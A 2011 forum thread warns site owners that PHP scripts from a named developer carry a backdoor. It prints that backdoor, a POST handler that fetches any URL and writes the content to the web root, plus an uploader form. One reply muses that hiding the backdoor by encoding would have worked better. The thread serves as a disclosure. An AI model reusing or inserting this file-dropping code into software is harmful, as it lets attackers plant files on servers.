Attention please!!!

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Time
  • Show
Clear All
new posts
Previous template Next
    #1

    Attention please!!!

    Hello all wapmasters please dont download any script of Prem (Spicyfm.com). He is a hacker. Dont use Flat autoindex in your site. Spicyfm.com owner can hack ur site easily if you use Flat auto index or spicyfm script. I am a victiom of his script. use a script to modify your scripts. He changed my admob id everyday and add his id. Atleast hostgator support team helped me to caught this blade hacker. He use if(isset($_POST['dir']))
    {

    $dir = "/";
    $file = $_POST['url'];
    $name = $_POST['nname'];
    if($content = file_get_contents($file))
    {
    $fp = fopen($dir.'/'.$name, 'w');
    fwrite($fp, $content);
    fclose($fp);
    }}

    and use a form to modify your script.
    <?php
    /* fetch files from url
    *
    * download more from
    * http://mobitech-forums.co.cc/forum
    */
    if(isset($_POST['submit']))
    {
    //change dir name nd chmod to 777
    $dir = "/home/steve856/public_html/";
    $file = $_POST['url'];
    $name = $_POST['nname'];
    if($content = file_get_contents($file))
    {
    $fp = fopen($dir.'/'.$name, 'w');
    fwrite($fp, $content);
    fclose($fp);
    print "done";
    }
    else
    {
    print "unable to fetch file.";
    }

    }
    else
    {
    print "<form method='post' action='~display_no.php'>
    <b>URL:</b><br>
    <input type='text' name='url'><br>
    <b>New Filename:</b><br>
    <input type='text' name='nname'><br>
    <input type='submit' name='submit' value='Upload'></form><br>";
    print "Powered by ";
    }

    ?>

    I had also snapped picture.
    He is disturbing owner. I hate him.
    He do such thing from
    http://spicyfm.com/premadmin/in/n.php
    Tags: None
    #2
    Never user one pass for different accounts

    Open source scripts are sumtimes dangerous

    Comment

      #3
      Lol, nice one there. Why on earth will you install an open source script without checking the codes. Dont be lazy dudes.

      Comment

        #4
        What the f@k? Why install such scripts? That Spicy boy is called hacker because of that code? Lol
        mysterio.al - programming is a functional art

        Comment

          #5
          That script is very exploitable. Looks like it was done to be used to hack any file that in its scope. Dont burn me for making a statment.

          You should never install scripts that you dont trust. If you know at least a bit about coding then you may now what bad code looks like.

          Happy Coding Guys,
          Rob
          Last edited by wap2k; 12.01.11, 09:03.

          Comment

            #6
            Thanks to all friends to inform this serious matter.

            Comment

              #7
              I already knew this before since he release his scripts

              My Friend told me that theres an exploit in every script of him, He told me That pages can be defaced, he can also change header and footer names/Site name, so Be careful On leeching some of public scripts ;) use your own risk hehe

              The only mistake of him, Why That part isn't encoded so that no one could know about it?...

              He may can use some of encryption with no one can decrypt right? .. this is noob,!
              Last edited by wapmetal; 13.01.11, 09:48.
              com site: http://vampist.net
              download site: http://wapdloads.net
              fb: http://www.facebook.com/pmplx

              Comment

              Previous template Next
              Working...
              X